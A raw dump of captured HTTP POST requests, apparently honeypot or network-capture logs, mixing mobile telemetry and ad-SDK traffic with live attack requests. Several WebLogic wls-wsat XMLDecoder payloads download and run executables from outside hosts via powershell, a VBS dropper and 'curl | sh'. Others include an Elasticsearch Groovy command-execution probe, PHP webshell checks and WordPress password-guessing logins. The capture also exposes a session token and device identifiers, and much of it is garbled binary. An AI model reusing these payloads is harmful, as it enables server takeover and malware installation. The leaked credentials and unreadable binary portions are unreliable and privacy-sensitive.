RPRbw4ucZC/3k8Rd2R7pcCQvKQhyHrd4bnSKOjdXcxOABQghTC6XhiYXv0Hw28vZBro5scEfh+euaj90iNFaG0H0yfpxR0WOSVarcDOD/r29QmNr46hi3OntdwKX84pfwbn6mneEDoeDDOc0z5acCJw4ldscK8Bhjp126J8yncrJykuD/KuqUZnsJaJF0ikxP/kzK9EejpcsQd127f07rp12ol9YN598Ct2+J8SFHoTwgd0P33ZS+KuMN9kGnI4N7lXkQgDxTZ7nPM4i+VHMlUUKcrWSYwj4JrhIKKgog/8Ehm6CumwRWQ7YV5gpbsBzw3ohlfDdadIQp+9yCNBukA/pDCLvw04Ik+yMGb4JzJuhzFfiTJ/gfdUh+IFYUmJj/BM=

POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126

~˜ÚUB
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjGUìGË¥å€TªuN’ôÅ,`	ôÑ_≠åAˇ∑YñZ–æ≈7C#‹,ïr?£^·+6:î'@˚g¶“IH®ë®Ës‚f´õü˘5É√F˝¸∏∫è

POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558

.◊“
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjb∆–öÏç2àÆ
±ks.ç≤öÿÌ)œ*Ö¿;h¨{¨Âπ6%'uÙdÓG£nj®·f∂íKÅ°ù=$ßSõÍ®+!ÒÌ√√∆Ωı(^∏›j»§O&7ª†vdÿ
Ï∫xBpÍ=u´k˝ä=(‡y≥;/Z,ª=%ä|7ÅÈ?oèqxsû(
n\˝L.
ˆù©>€fl.#ât˛sc|ìÈñ;P
ãÊ—ÑØ"dyësä˙Ó ˛à_¿œ{ÜÎ∞ΩQE 	Jn˙öæîqäDÀám"T~ÖµµXÙK`Úëë«”;…—ö≤Àª§Â˝±zb”ˆÕËÊÇ—[•6ôÜüΩQ◊h)˘„%ÙÑ^V—_€/Ç–“÷n{[∆TQ–u&щUÃP®¬•1¬ì8ıõn|%s¯
É√?ê¿VTD©¶B™
ΩÅp§∂q<·‡,ËMë"∂ˇ∂”*[nXSN«¢Gbh⁄€ô°ÁOXuMtpÍ>e2¬˘‹óhl÷ñ„òIÛµùy>fi5€¢ítín†-%-·ÊŸ;GrÆk Ã˛Z<|&´5û∂øÙá∞çx¿ Óõ.ë qûY ¨˙ ºúljÎ-Ktä÷√Ñ˘∞¿
n˘úˆôoK√ÇË–ßfi4}Ü6ò‘ÊU∏Ê•*d˝¿’Xs¢
â]‰Ï

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1051
Content-Type: multipart/form-data; boundary=2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

525117
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

7f808f8f6ed0d07bbc948d963ae91aae
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
a‰ÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl

POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477853105363
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.co
Connection: Keep-Alive
Accept-Encoding: gzip

2b3
1.0575cfd16e0f55a5209001140@f6b495cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0c58Ï”ÂÄû›xúïêMkA«á¥ij¨».è4H÷C÷y›yπ≈Rbµ®π	2Ÿô©ãõl…b∞=)¯rTÍ≈!û˚9<z~1±/zhPô”¿Û<ˇˇÔ◊é–Ï°6Äê"éd!¨†XcL«∞¿R}{˝˘Ÿ9àÚjò>}XîÖ≠ÏÓnZ_ÓEö"ÕR	+õUµS˙Ì“Ó	Wâ6úöô
eË∫Q‹Ù2√¥È	C7åX7òF…Ãubho⁄‚|Ü
%&«ÜK√î±\íÿyO¶ç¶’îu"h)Y»∞SDzîïdyÛ^˜ñ¬Ñ¡ZÔŒ÷Dv∂«UÓÎ∫w∆~“¡ùd"À+–Íç‹∏*4≥ߧ}∏úEjπ∫G¸	°–™Ì∞~<⁄âæº˙˙æÚá•≠€◊æ
'I®ùÅÜA£W°§53ìN’,¢v¸˝˘€˝}ts≠˘r±p¡¬eLµÃ	°›‹Ò–ÂÉ<t5ñ¨´¥tAk2`^«ÔfiÃ÷¢Z™˝∏∞%¨rÇe–x Ò@
wÒßG#Õ¬
ù¯õ´¯„Ò¸ä=D0•_µég¬nΩ‚öQÔ'/m~ä‡flπÔ√atÚo—f'ìπ'¡&Û`¸rò¸èC&ÛxB?
«b‹«@000095cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0000 45073f5a0bdcd442978b484d89c842ea


POST http://check.proxyradar.com/azenv.php?auth=149298820203&a=PSCMN&i=2335908067&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive



POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=twaTEysZTv2ahyApbwoKlofZ2m5JYr
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

357717
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

e544caf2fd7e6a8cfe2c9fd97ae39786
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--twaTEysZTv2ahyApbwoKlofZ2m5JYr--


POST http://check.proxyradar.com/azenv.php?auth=149660222439&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=777777

POST http://t3.proxy-checks.com/favicon.ico HTTP/1.1
Host: t3.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496019332806
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2363

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959¶Ä⁄íÚUÂxúÕWko⁄ ˝+üÓΩÕ…±«å•~01v!ô°PÉfl!c¸∂kpW˝ÔwèIS“¶/ı∂™¢H`˚±÷⁄èy◊Y˛±£æΑ€†JÉ˚ Ì®ÆsŸ	í˚é˙flwù^OíYt
‘’ê.$MtC‘}pÕ
⁄Cëø2›,x≥s´›≤ÿÖ©≤Ãã*sS0µ¨≥2áóp∆+≤+?ZØÉ*»Ω`‰~PÌ√h\mì®⁄]’Ê +ºbã¸√ïWñWZYjfi.∫èvG∞¥€vT^Ï…'£ÆƒÒ Âóº™ùŒ˚À≥¿πˇ[¬ídt˘ºœÛ†ä|lY‹„˚†˙u—à퓪¸ƒŸßÿ¸>“$Òˇ«ë&ˆ§.˜«ê&ˆ∫˙ÉHÉxz≤¯«ë&)¢"}iÆˇ&,ˆÀ≤ÿFª®»óhÈ©{\Ú∑‰%Ó◊≈'Û\˜ÚõÓªæ†#º¸ÁË‚ëd˘´˙˙Á˝?óùm∞›Ä€v‚∏ıÆ(›Mp˙∆>-ˇ?Å˘uÂ2û:™¿ã–=(øƒº(ubyµêsÃB˛-6ª®
„q
Úr=
[FºpÓ*wΩé<6€˝büßÖÎ/üÒ=Ñ∫
wŸ©Àß/IÊÒ=Ã(©ßædAP|=è˚è·*äη&ú±˘·Â¥·\∂€ŒÚ|›ÒÎé
p|xƒ/·”}CT©eaW√cÓ±ZæeÛ,tY‚æÍD@ºpÓ‰/˛ªΩú?∫‹œF*ÖØz{"Èü
]˙lÙ(ΩÓœÖÆH†⁄Ø9Ř]A¸Ÿ»Âœõ˜$rP,îU∏>Î∂Ô:k7JYokh√€÷ûÎy–‰ñ€zµ;ñ¨*^Ωy≠ΩÀnY&
ÏÈIv›@TÇÄ[KíÎãäÀqºà÷ß3Kˉ€6Îœ*µ
∂EZÔûÙ˜ûSX¸Áñ^·É∂G˚¡}‰À∞åBºµX€aM†)r8÷}<ı°∫πWp&ÛÿúÂTEV=YÌ)ÍZP^DYYE˘éÕî=¬}°t”reœ®n
∏±E˜Xß<±{¢ÏMȱX.ÃÎçÄ-ç€a}s$çckû€HiìÔr¨'¸ÿö5MiHÇıô‡Ëi§ıIπ 	GÌ√vÅåΩgÙê≥5Æ›´Mmx˜›õúto£πGotèß÷<πÀ[˚∫&—xãƒöàcK;‡Xp6ã
ÿûáÿ4‚±Ö5•µ'L√ïyXSÜ´LJW˝ça	”‚.wC;*õ‡(¶m&ƒéÓ	ÕDOXfç{{lì–±¥=ÕhCcˆ?Ø”tÁ5mzØ˙Ϊ‹œÊG•˜´psç≠ÕÛñõ·qlMx‹åí±IEÇhÉcÅÕÜZ3éXCŃitóèM#”˙˝3嶰oŒ9◊ÊS≥èèX∑ñ∆flZCqàå„	«∏1ä∑û∞≠GÛ√¶ Õ<$ˆD‹Fƒ¶ƒ—xr$ÒÊàc#t‡≠¸‚lî‚&ë‡≥‰h⁄ÕJ Î≥|r-r∑Ò§ÕÈ.ˇ<+≠!ñë·lyÑ&∂)Gt`¢!!µÅ"#¡Ê(‘4ô⁄Ïpk·>∏7w˘ß,ü4‘«ˆ‚öâNÜ%'ˆcÇÄs–!…ú–…úå4˝îdM_åRœÏ}£∑øÀWËPR!°öEø¿¿@≈[^„ÅDò.uà≠¡åã„ÿ$1—߆Æ!®W”ú∑Ób ÅR®Ox£∏°Ò≈Õ	]ViL‚~‰ƒICÃQB,ÑÅd3ûqÎÿC®õ‰àÌ…ûq:‰∆̵óÕ˜+aƒ-@ù¿È—œå-h^¬œhû°Ac'$ç™üq∏I‹rä„0n˝€£ò˙‘A±ZëÇ⁄RÌÿ{™g$\-˙°k˚µˇ*›;•;~AÆ[Ö8Ÿaã6L!ì=†ú–f"ÀIùxîoàZ*ÓÄ
'l•)Œ
O¥ÅoÛ•”fllK	Tt¿h≤≈Tfi]N—Ä'&†kÕ†j܆∑Í°⁄&›
Óã«NL—<ŸR
úCù∆⁄
öM;‘+æóπ–+„t
\iÍû«™mO›S∆D<‹®m$4ÉhÕ0D›D ¶
ôÕ4c2§C›Â&G«t†á—ΩcD–Z4∂i3∂˙ôÍ6h¸¿ÚÚÂ]Œñæzµ,∂.ŒÜm[˚∞õuy∏(znUEß˛Ò¡º€>m'À∫Nœ/<6ÙU·Vl‡·7Æxöª»s”ÂiÒ'Ñõ◊k◊€’UÎrπE±Vflnë^Âõ∂›€¯:3jÁ’Ëfiµßk◊ûPΩa`ûµT¨OD(Œ	›7w˚«ûkM_ŸFlˆçÎtÀ͆ê@„zô·¶ùæ[ú7=4?∫6˙Ü ƒ§˚ÒÙ©Õ
ê—È&É.X{6Ù	À…5«çÕÙºjA€çA£pbO-®®:£‘{¬ç	™û]k⁄ºtL>!”ß˙ÑöyPËóÙ˘ˆ^
ö.@ö9Ÿk-≥0–—rø*"ˇazo£MÓ2`·ç(™“µjTITuNÌvUYSCE≤*ı’kNDU–U‘SªHÂ˚`¡+kfqäԪشÇÒ]TUp¡_¸Îæõ˛ª]›Ω‰˚/3L8~r¶%˘äªÍu•p∫^?3ˆ?®™rsˇ\#ß˝û ÛÓo¡dAuæ´ÿf3‘[PŒºâW◊*+Û%vG‚zÅœÛêÁÉ)W›û$q´í{]‰1«—∂dóÎá¸˙i·%ØζIÉãQ∞oó9ñ“√zı˛3q∑Y›X3E|›Æ6^ñ{ß⁄J›|S|-bz°õÁÌ∫‰πYÈ{ÃÓK˜©ΩS•≤Kè ¬›q˜˛˝ˇür˝¬@f43f4cd056c22b3019d79ee56b88f0eb1978038acb6f141888525ce00e460200 0bd8f287815b79ea3108dc0de0b51abb

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=152330914303&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

Q6AIlNmbNoK6kIEezX/6R/U61tknzWvQEQPUGNa0I3E7eQ6955NGo6z+GYxdSISP4Lfdbl+UGmDGvAcAsbZ1PByEKnFJrN0txmVZxu9On7WdZAHaXicYrmBwW3K/LHpFst3ncLo5Iut5ZKfNiWM6H7qql64Yfjx0D03tiEdoFcTwjqnIoGIGspOdGXc/Ft7T7IqFo+7UMMfMAqRRqz/ESN0EqKwhU+O1UEj3+lFaXEYtwyT2FYG6Dzuv6ZRGJSQ7emG1WZJYeNpl19rnundteeTS1p2sgj6eDiQo7TLsCzumkzC4rwrMLTbcBPnq5MZ9laJWljXhwQzwZMpb9gVuAWzAwM+4JQ5dXOw2Q6PbYGAf0qdICwjx

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

E/EIld3MYhaTslWqg98m7BaaxcpoOvg1AW3+VuXXdshFg86qNNnxPeIMTzf9q4+Gtewc8WHDt7Swa+TnhbImSvWtUmIkXiwsUgzf4XkdExf1mScbNabk+/lL5IEzwbC4G9qdH/FowZ9p1qnlCYS/jkfnjkE8cG+vBqe5zxDA69/8O2xjPobCTNN61LMV7ZysFOO1+Jjzhmqi3yJywZmX9cARZnfwqP18zQeB2a3ETF+yqUd+nUO+AxCpcp5ovW8m7b7ktLZNm/9lAzf3IwaoSClwa3UyJjGc1svv+rw5ssvE4nPUPuRYjkyUWXxCfGnywe+eDUN9vh5wh+MXSdPi7K3PFlxnXEGe/SYcXFltI/+ZSC8oJQgxWqLq6YVmGsioaaJv6bCIHDpEm0pnG5xXCkDtg8JV

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://api.device.xiaomi.net/api/user/device/setting HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: serviceToken=oi/auDVRQ0HDLoTc90F1cgihAZ334eWaQPM61lxIqaMCOFcxIv+M+Qm96mL4TwAL1hH+5y7pGNUF67O4Qz59ZMI+i8HOwIsBYUitruC/ixFPPhlRNIAEdDF7lnxY7hUi+8is2r2ZDkJcUsFobL0NfwZ273zfLh1R3GI6Q9+UCvCJFCmE6Q0y/ud/YYZ9OkRjz1rbJaJgFHTFLrZWVArlvQ==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: api.device.xiaomi.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 210

devId=otYzHJYP%2BGN0su3hwqld0bZ%2FQqc1EJiz3Wgrazt405w%3D&content=VREOWkPe%2Fj9pu3g5S3PCOjy1XDqrAyHpR3Qs5UjvdYUr89m6C8lYB%2Fd7dsLf0Dzr&signature=fJhNQjXIOX2xv1nJp9jxiAR8Vf0%3D&userId=sG4wD14mVIEUlpt3sFsx6Q%3D%3D

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

E6AMyd2ZNWFzLdKBlnuS0AiowViPtgHBB9G4aln0+TTdOPvtH91M3+EJd5jV+Bv8XBrRE9N1ocuPSWjPSewlQL1jSRmYfqzht5VVVfmRGOqU0onx3rbPO8bcq4UJr9uf2I1XRjDdt2PQEnFSdAhOctdbqFnefnpzZ6DeFgOCf6PoJUMespSYjlXWyvzAUlS7TDtOMMsNy4QIlj6+dgi4hZ5rqrbECHwYMg0Zr5W5obJmWgwWSWPQIfC/k3E2kjyZNEIPwNbHTXVNaUMsC3fwp1ylqY9kVZlP5yKiTp31Y+Lve1NXgNl9aTlMRXwtXRVvtigx7ZBbIbbj58snr1De3dFNTn5JM3ifUQeVqeLJbbyRvdiNNCO1eA1e3ktMb47oqR5j92cOQLHaBq+SKgMUPevv1iPq6vuBkLbCDJcEjqaP7ss9U/+Y

POST /_search/ HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:9200/_search/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: x.x.x.x:9200
Content-Length: 451
Cache-Control: no-cache

{
    "size":1,
    "script_fields": {
       "secpulse": {
         "script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",
       "lang": "groovy"
  }
  }
}

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
